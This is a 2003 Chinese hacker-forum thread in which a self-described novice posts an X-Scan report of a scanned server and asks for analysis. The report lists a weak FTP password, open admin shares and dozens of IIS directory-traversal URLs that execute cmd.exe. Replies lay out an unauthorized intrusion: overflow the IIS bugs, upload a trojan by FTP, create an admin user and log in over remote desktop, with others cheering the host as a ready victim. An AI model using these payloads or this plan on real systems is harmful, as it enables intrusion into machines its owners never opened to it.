论坛: 菜鸟乐园 标题: 请高手分析~~~我扫到的~~ 复制本贴地址    
作者: jhz9 [jhz9]    论坛用户   登录
X-Scan v2.3 检测报告

[扫描结果索引]: "172.16.**.**"

  开放端口
  Snmp口令
  SSL漏洞
  RPC漏洞
  SQL-Server弱口令
  FTP弱口令
  NT-Server弱口令
  SMTP漏洞
  POP3弱口令
  CGI漏洞
  IIS漏洞

  [NetBios信息]
  服务器信息 网络共享资源列表

--------------------------------------------------------------------------------



详细资料


[开放端口]

端口13开放: Daytime 
 [Banner] 
 13:51:12 2003-6-24 
 [End of banner] 
端口17开放: Quote of the Day 
 [Banner] 
 "When a stupid man is doing something he is ashamed of, he always declares that it is his duty." George Bernard Shaw (1856-1950) 
 [End of banner] 
端口21开放: FTP (Control) 
 [Banner] 
 220 Netserver Microsoft FTP Service (Version 5.0). 
 [End of banner] 
端口19开放: Character Generator 
 [Banner] 
  !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh "#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi #$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij $%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk %&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl &'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm '()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn ()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno )*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop *+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq +,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr ,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs -./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij 
 [End of banner] 
端口25开放: SMTP, Simple Mail Transfer Protocol 
 [Banner] 
 220 Netserver Microsoft ESMTP MAIL Service, Version: 5.0.2172.1 ready at Tue, 24 Jun 2003 13:51:12 +0800 
 [End of banner] 
端口80开放: HTTP, World Wide Web 
 [Banner] 
  [None] 
 [End of banner] 
端口7007开放: afs3-bos basic overseer process 
 [Banner] 
  [None] 
 [End of banner] 
端口9开放: Discard 
 [Banner] 
  [None] 
 [End of banner] 
端口7开放: Echo 
 [Banner] 
  [None] 
 [End of banner] 
端口42开放: Host Name Server 
 [Banner] 
  [None] 
 [End of banner] 
端口53开放: domain, Domain Name Server 
 [Banner] 
  [None] 
 [End of banner] 
端口135开放: Location Service 
 [Banner] 
  [None] 
 [End of banner] 
端口139开放: NETBIOS Session Service 
 [Banner] 
  [None] 
 [End of banner] 
端口443开放: HttpS, Secure HTTP 
 [Banner] 
  [None] 
 [End of banner] 
端口445开放: Microsoft-DS 
 [Banner] 
  [None] 
 [End of banner] 
端口3389开放: Windows 2000 remote admin 
 [Banner] 
  [None] 
 [End of banner] 

插件类型: PORT 
插件成员名称: 开放端口 
插件作者: glacier 
插件版本: 1.7 
风险等级: 低 
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 


--------------------------------------------------------------------------------


[Snmp口令]



--------------------------------------------------------------------------------


[SSL漏洞]



--------------------------------------------------------------------------------


[RPC漏洞]



--------------------------------------------------------------------------------


[SQL-Server弱口令]



--------------------------------------------------------------------------------


[FTP弱口令]

ftp/[口令与用户名相同] 

插件类型: FTP 
插件成员名称: FTP弱口令 
插件作者: glacier 
插件版本: 1.1 
风险等级: 高 
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 


--------------------------------------------------------------------------------


[NT-Server弱口令]



--------------------------------------------------------------------------------


[NetBios信息]

[服务器信息 Level: 1]:
主机名称: "NETSERVER"
系统版本: 5.0
主机类型: PRINTQ_SERVER WINDOWS BACKUP_BROWSER SERVER_OSF SERVER_VMS DFS 

[网络共享资源列表 Level 1]:
"E$": 磁盘 - [默认共享]
"IPC$": 进程间通信(IPC$) - [远程 IPC]
"D$": 磁盘 - [默认共享]
"ntpasswd": 磁盘 - []
"F": 磁盘 - []
"ADMIN$": 磁盘 - [远程管理]
"C$": 磁盘 - [默认共享]



插件类型: NETBIOS 
插件成员名称: NetBios信息 
插件作者: glacier 
插件版本: 1.1 
风险等级: 高 
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 


--------------------------------------------------------------------------------


[SMTP漏洞]



--------------------------------------------------------------------------------


[POP3弱口令]



--------------------------------------------------------------------------------


[CGI漏洞]

/scripts/samples/search/qsumrhit.htw [漏洞描述] 
/scripts/samples/search/qfullhit.htw [漏洞描述] 
/null.ida [漏洞描述] 
/null.idq [漏洞描述] 
/_vti_inf.html [漏洞描述] 
/abczxv.htw [漏洞描述] 
/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 [漏洞描述] 
/_vti_bin/shtml.dll/_vti_rpc [漏洞描述] 
/_vti_bin/shtml.exe [漏洞描述] 
/_vti_bin/shtml.dll/nosuch.htm [漏洞描述] 
/_vti_bin/shtml.dll [漏洞描述] 

插件类型: HTTP 
插件成员名称: CGI漏洞 
插件作者: glacier 
插件版本: 1.4 
风险等级: 高 
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 


--------------------------------------------------------------------------------


[IIS漏洞]

/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini [漏洞描述] 
/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini [漏洞描述] 
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 

/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述] 

/_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述] 
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述] 

可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 

可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 


插件类型: HTTP 
插件成员名称: IIS漏洞 
插件作者: glacier 
插件版本: 1.4 
风险等级: 高 
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎 


--------------------------------------------------------------------------------



扫描全部完成 




地主 发表时间: 06/24 14:21
回复: vishx [vishx]   论坛用户   登录
改掉他的主页很简单~
端口3389开放
ftp/[口令与用户名相同] 
E$": 磁盘 - [默认共享]
"IPC$": 进程间通信(IPC$) - [远程 IPC]
"D$": 磁盘 - [默认共享]
"ntpasswd": 磁盘 - []
"F": 磁盘 - []
"ADMIN$": 磁盘 - [远程管理]
"C$": 磁盘 - [默认共享]
可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 

可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 


B1层 发表时间: 06/24 15:21
回复: 123 [china_fy]   论坛用户   登录
兄弟你爽了。aspcode 漏洞溢出就可的到guest权限,我们用ftp上传木马,运行就可干活了。*.ida   *.idq  就不要说了 ,溢出就可得到admin权限,可建用户,又有3389  远程登陆

B2层 发表时间: 06/25 11:34
回复: jhz9 [jhz9]   论坛用户   登录
啊~~
我刚接触黑客~~
不懂啊!!

B3层 发表时间: 06/25 12:23
回复: zhangkai [zhangkai]   论坛用户   登录
我也不懂
谁来解释一下????

B4层 发表时间: 06/25 16:09
回复: sweet_day [sweet_day]   论坛用户   登录
兄弟能扫到这样的主机,不错哟!晕死 ~!漏洞一大堆!不知道他的网管是作什么吃的?呵呵!

B5层 发表时间: 06/25 16:26
回复: miku [miku]   论坛用户   登录
开的端口是不是多了点?
我想不可否认被人入侵过的可能!



[此贴被 ☆影子☆(miku) 在 06月25日16时32分 编辑过]

B6层 发表时间: 06/25 16:33
回复: k9k6k3 [k9k6k3]   论坛用户   登录
我看啊~~是不是你自己打上去的啊?
就算是SB也不可能样这么多的LD存在啊~~
那我们开心?


B7层 发表时间: 06/25 17:06
回复: dormouse [dormouse]   论坛用户   登录
简直是大餐。。。。

B8层 发表时间: 06/25 17:23
回复: hacker521 [hacker521]   论坛用户   登录
不会是管理员装的蜜罐吧,现在怎么可能还有开这么多端口和漏洞的主机呀

B9层 发表时间: 06/25 17:35
回复: aney [aney]   论坛用户   登录
好东西啊~你爽呆了

B10层 发表时间: 06/25 18:21
回复: bcliangzi [bcliangzi]   论坛用户   登录
哈哈哈,不错!真是块不错的面包!管鲁员真够大方的!呵呵!谁还没有肉机呀!上吧。

B11层 发表时间: 06/25 21:08
回复: napolun [napolun]   版主   登录
为什么我就没有这样的运气,唉。

B12层 发表时间: 06/25 22:55
回复: wolfjin [wolfjin]   论坛用户   登录
我估计是中蠕虫病毒一类的吧,怎么可能这么多!!!

B13层 发表时间: 06/26 03:43
回复: weigar [weigar]   论坛用户   登录
美味到极点啊~~
我几个星期没找到了
55~~~
可怜的人啊

B14层 发表时间: 06/28 17:00

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号